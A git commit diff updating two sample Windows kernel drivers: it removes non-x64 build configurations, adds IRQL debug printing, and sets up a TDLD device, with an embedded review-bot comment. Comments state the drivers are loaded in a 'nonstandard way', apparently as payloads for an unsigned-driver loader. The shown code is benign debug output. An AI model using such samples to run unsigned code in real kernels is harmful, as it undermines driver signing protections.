Update for Windows 10rs2 (15063)
This commit is contained in:
hfiref0x 2017-04-20 16:52:12 +07:00
parent 7e4aec975f
commit 9db2618d9e
16 changed files with 379 additions and 492 deletions





@ -1,7 +1,7 @@
 
Microsoft Visual Studio Solution File, Format Version 12.00 Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 14 # Visual Studio 14
VisualStudioVersion = 14.0.24720.0 VisualStudioVersion = 14.0.25420.1
MinimumVisualStudioVersion = 10.0.40219.1 MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dummy", "dummy\dummy.vcxproj", "{3D8146DE-8064-46C0-9E70-CEEC357B2290}" Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dummy", "dummy\dummy.vcxproj", "{3D8146DE-8064-46C0-9E70-CEEC357B2290}"
EndProject EndProject


@ -1,14 +1,6 @@
<?xml version="1.0" encoding="utf-8"?> <?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> <Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations"> <ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64"> <ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration> <Configuration>Debug</Configuration>
<Platform>x64</Platform> <Platform>x64</Platform>
@ -17,22 +9,6 @@
<Configuration>Release</Configuration> <Configuration>Release</Configuration>
<Platform>x64</Platform> <Platform>x64</Platform>
</ProjectConfiguration> </ProjectConfiguration>
<ProjectConfiguration Include="Debug|ARM">
<Configuration>Debug</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|ARM">
<Configuration>Release</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|ARM64">
<Configuration>Debug</Configuration>
<Platform>ARM64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|ARM64">
<Configuration>Release</Configuration>
<Platform>ARM64</Platform>
</ProjectConfiguration>
</ItemGroup> </ItemGroup>
<PropertyGroup Label="Globals"> <PropertyGroup Label="Globals">
<ProjectGuid>{3D8146DE-8064-46C0-9E70-CEEC357B2290}</ProjectGuid> <ProjectGuid>{3D8146DE-8064-46C0-9E70-CEEC357B2290}</ProjectGuid>
@ -45,22 +21,6 @@
<WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion> <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>
</PropertyGroup> </PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion> <TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries> <UseDebugLibraries>true</UseDebugLibraries>
@ -78,38 +38,6 @@
<DriverTargetPlatform>Universal</DriverTargetPlatform> <DriverTargetPlatform>Universal</DriverTargetPlatform>
<WholeProgramOptimization>true</WholeProgramOptimization> <WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup> </PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings"> <ImportGroup Label="ExtensionSettings">
</ImportGroup> </ImportGroup>
@ -118,18 +46,6 @@
</ImportGroup> </ImportGroup>
<PropertyGroup Label="UserMacros" /> <PropertyGroup Label="UserMacros" />
<PropertyGroup /> <PropertyGroup />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor> <DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet> <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
@ -143,30 +59,6 @@
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir> <OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir> <IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup> </PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile> <ClCompile>
<SuppressStartupBanner>false</SuppressStartupBanner> <SuppressStartupBanner>false</SuppressStartupBanner>
@ -192,36 +84,6 @@
<Profile>false</Profile> <Profile>false</Profile>
</Link> </Link>
</ItemDefinitionGroup> </ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile> <ClCompile>
<TreatWarningAsError>false</TreatWarningAsError> <TreatWarningAsError>false</TreatWarningAsError>


@ -1,12 +1,12 @@
/******************************************************************************* /*******************************************************************************
* *
* (C) COPYRIGHT AUTHORS, 2016 * (C) COPYRIGHT AUTHORS, 2016 - 2017
* *
* TITLE: MAIN.C * TITLE: MAIN.C
* *
* VERSION: 1.00 * VERSION: 1.01
* *
* DATE: 29 Jan 2016 * DATE: 20 Apr 2017
* *
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -31,33 +31,55 @@ DRIVER_INITIALIZE DriverEntry;
NTSTATUS DriverEntry( NTSTATUS DriverEntry(
_In_ struct _DRIVER_OBJECT *DriverObject, _In_ struct _DRIVER_OBJECT *DriverObject,
_In_ PUNICODE_STRING RegistryPath _In_ PUNICODE_STRING RegistryPath
) )
{ {
LARGE_INTEGER tm;
PEPROCESS Process; PEPROCESS Process;
KIRQL Irql;
tm.QuadPart = -10000000; PWSTR sIrql;
/* This parameters are invalid due to nonstandard way of loading and should not be used. */ /* This parameters are invalid due to nonstandard way of loading and should not be used. */
UNREFERENCED_PARAMETER(DriverObject); UNREFERENCED_PARAMETER(DriverObject);
UNREFERENCED_PARAMETER(RegistryPath); UNREFERENCED_PARAMETER(RegistryPath);
DbgPrint("Hello from kernel mode, system range start is %p, code mapped at %p", MmSystemRangeStart, DriverEntry); DbgPrint("Hello from kernel mode, system range start is %p, code mapped at %p\n", MmSystemRangeStart, DriverEntry);
Process = PsGetCurrentProcess(); Process = PsGetCurrentProcess();
DbgPrint("I'm at %s, Process : %lu (%p)\n",
do {
KeDelayExecutionThread(KernelMode, FALSE, &tm);
DbgPrint("I'm at %s, Process : %lu (%p)",
__FUNCTION__, __FUNCTION__,
(ULONG)PsGetCurrentProcessId(), (ULONG)PsGetCurrentProcessId(),
Process Process);
);
Irql = KeGetCurrentIrql();
} while (1); switch (Irql) {
case PASSIVE_LEVEL:
sIrql = L"PASSIVE_LEVEL";
break;
case APC_LEVEL:
sIrql = L"APC_LEVEL";
break;
case DISPATCH_LEVEL:
sIrql = L"DISPATCH_LEVEL";
break;
case CMCI_LEVEL:
sIrql = L"CMCI_LEVEL";
break;
case CLOCK_LEVEL:
sIrql = L"CLOCK_LEVEL";
break;
case IPI_LEVEL:
sIrql = L"IPI_LEVEL";
break;
case HIGH_LEVEL:
sIrql = L"HIGH_LEVEL";
break;
default:
sIrql = L"Unknown Value";
break;
}
DbgPrint("KeGetCurrentIrql=%ws\n", sIrql);
return STATUS_SUCCESS; return STATUS_SUCCESS;
} }
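Review bot: The IRQL switch added to DriverEntry prints only the name, so any level that falls into the `default` branch is reported as `Unknown Value` with no way to tell which numeric value was actually seen; the other main.c in this commit prints both, `DbgPrint("KeGetCurrentIrql=%u(%ws)\n", Irql, sIrql);`, and the same line would serve here. `sIrql` is only ever assigned wide string literals, so `PCWSTR sIrql;` describes it more honestly than `PWSTR`. The switch is also a verbatim copy of the table that the second example wraps in PrintIrql; if the two examples are meant to stay in step, a shared helper keeps the tables from drifting.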


@ -1,7 +1,7 @@
 
Microsoft Visual Studio Solution File, Format Version 12.00 Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 14 # Visual Studio 14
VisualStudioVersion = 14.0.24720.0 VisualStudioVersion = 14.0.25420.1
MinimumVisualStudioVersion = 10.0.40219.1 MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dummy", "dummy\dummy.vcxproj", "{3D8146DE-8064-46C0-9E70-CEEC357B2290}" Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dummy", "dummy\dummy.vcxproj", "{3D8146DE-8064-46C0-9E70-CEEC357B2290}"
EndProject EndProject


@ -1,14 +1,6 @@
<?xml version="1.0" encoding="utf-8"?> <?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> <Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations"> <ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64"> <ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration> <Configuration>Debug</Configuration>
<Platform>x64</Platform> <Platform>x64</Platform>
@ -17,22 +9,6 @@
<Configuration>Release</Configuration> <Configuration>Release</Configuration>
<Platform>x64</Platform> <Platform>x64</Platform>
</ProjectConfiguration> </ProjectConfiguration>
<ProjectConfiguration Include="Debug|ARM">
<Configuration>Debug</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|ARM">
<Configuration>Release</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|ARM64">
<Configuration>Debug</Configuration>
<Platform>ARM64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|ARM64">
<Configuration>Release</Configuration>
<Platform>ARM64</Platform>
</ProjectConfiguration>
</ItemGroup> </ItemGroup>
<PropertyGroup Label="Globals"> <PropertyGroup Label="Globals">
<ProjectGuid>{3D8146DE-8064-46C0-9E70-CEEC357B2290}</ProjectGuid> <ProjectGuid>{3D8146DE-8064-46C0-9E70-CEEC357B2290}</ProjectGuid>
@ -45,22 +21,6 @@
<WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion> <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>
</PropertyGroup> </PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion> <TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries> <UseDebugLibraries>true</UseDebugLibraries>
@ -78,38 +38,6 @@
<DriverTargetPlatform>Universal</DriverTargetPlatform> <DriverTargetPlatform>Universal</DriverTargetPlatform>
<WholeProgramOptimization>true</WholeProgramOptimization> <WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup> </PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings"> <ImportGroup Label="ExtensionSettings">
</ImportGroup> </ImportGroup>
@ -118,18 +46,6 @@
</ImportGroup> </ImportGroup>
<PropertyGroup Label="UserMacros" /> <PropertyGroup Label="UserMacros" />
<PropertyGroup /> <PropertyGroup />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor> <DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet> <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
@ -143,30 +59,6 @@
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir> <OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir> <IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup> </PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile> <ClCompile>
<SuppressStartupBanner>false</SuppressStartupBanner> <SuppressStartupBanner>false</SuppressStartupBanner>
@ -192,36 +84,6 @@
<Profile>false</Profile> <Profile>false</Profile>
</Link> </Link>
</ItemDefinitionGroup> </ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile> <ClCompile>
<TreatWarningAsError>false</TreatWarningAsError> <TreatWarningAsError>false</TreatWarningAsError>


@ -1,12 +1,14 @@
/******************************************************************************* /*******************************************************************************
* *
* (C) COPYRIGHT AUTHORS, 2016 * (C) COPYRIGHT AUTHORS, 2016 - 2017
* *
* TITLE: MAIN.C * TITLE: MAIN.C
* *
* VERSION: 1.00 * VERSION: 1.01
* *
* DATE: 29 Jan 2016 * DATE: 20 Apr 2017
*
* "Driverless" example #2
* *
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -19,6 +21,51 @@
#define DEBUGPRINT #define DEBUGPRINT
/*
* PrintIrql
*
* Purpose:
*
* Debug print current irql.
*
*/
VOID PrintIrql()
{
KIRQL Irql;
PWSTR sIrql;
Irql = KeGetCurrentIrql();
switch (Irql) {
case PASSIVE_LEVEL:
sIrql = L"PASSIVE_LEVEL";
break;
case APC_LEVEL:
sIrql = L"APC_LEVEL";
break;
case DISPATCH_LEVEL:
sIrql = L"DISPATCH_LEVEL";
break;
case CMCI_LEVEL:
sIrql = L"CMCI_LEVEL";
break;
case CLOCK_LEVEL:
sIrql = L"CLOCK_LEVEL";
break;
case IPI_LEVEL:
sIrql = L"IPI_LEVEL";
break;
case HIGH_LEVEL:
sIrql = L"HIGH_LEVEL";
break;
default:
sIrql = L"Unknown Value";
break;
}
DbgPrint("KeGetCurrentIrql=%u(%ws)\n", Irql, sIrql);
}
/* /*
* DevioctlDispatch * DevioctlDispatch
* *
@ -168,26 +215,6 @@ NTSTATUS CloseDispatch(
return Irp->IoStatus.Status; return Irp->IoStatus.Status;
} }
VOID ListModules(
_In_ struct _DRIVER_OBJECT *DriverObject
)
{
PLIST_ENTRY entry0, entry1;
KLDR_DATA_TABLE_ENTRY *section = (KLDR_DATA_TABLE_ENTRY*)DriverObject->DriverSection;
if (section == NULL)
return;
entry0 = section->InLoadOrderLinks.Flink;
entry1 = entry0;
do {
section = (KLDR_DATA_TABLE_ENTRY*)CONTAINING_RECORD(entry1, KLDR_DATA_TABLE_ENTRY, InLoadOrderLinks);
DbgPrint("Section=%p, %wZ", section, section->BaseDllName);
entry1 = entry1->Flink;
} while (entry1 != entry0);
}
/* /*
* DriverInitialize * DriverInitialize
* *
@ -202,37 +229,33 @@ NTSTATUS DriverInitialize(
) )
{ {
NTSTATUS status; NTSTATUS status;
UNICODE_STRING SymLink, DevName/*, DrvRefName*/; UNICODE_STRING SymLink, DevName;
PDEVICE_OBJECT devobj; PDEVICE_OBJECT devobj;
ULONG t; ULONG t;
WCHAR szDevName[] = { L'\\', L'D', L'e', L'v', L'i', L'c', L'e', L'\\', L'T', L'D', L'L', L'D', 0 };
WCHAR szSymLink[] = { L'\\', L'D', L'o', L's', L'D', L'e', L'v', L'i', L'c', L'e', L's', L'\\', L'T', L'D', L'L', L'D', 0 };
// WCHAR szNullDrv[] = { L'\\', L'D', L'r', L'i', L'v', L'e', L'r', L'\\', L'N', L'u', L'l', L'l', 0 };
// PDRIVER_OBJECT driverObject;
//RegistryPath is NULL //RegistryPath is NULL
UNREFERENCED_PARAMETER(RegistryPath); UNREFERENCED_PARAMETER(RegistryPath);
#ifdef DEBUGPRINT #ifdef DEBUGPRINT
DbgPrint("%s", __FUNCTION__); DbgPrint("%s\n", __FUNCTION__);
#endif #endif
RtlInitUnicodeString(&DevName, szDevName); RtlInitUnicodeString(&DevName, L"\\Device\\TDLD");
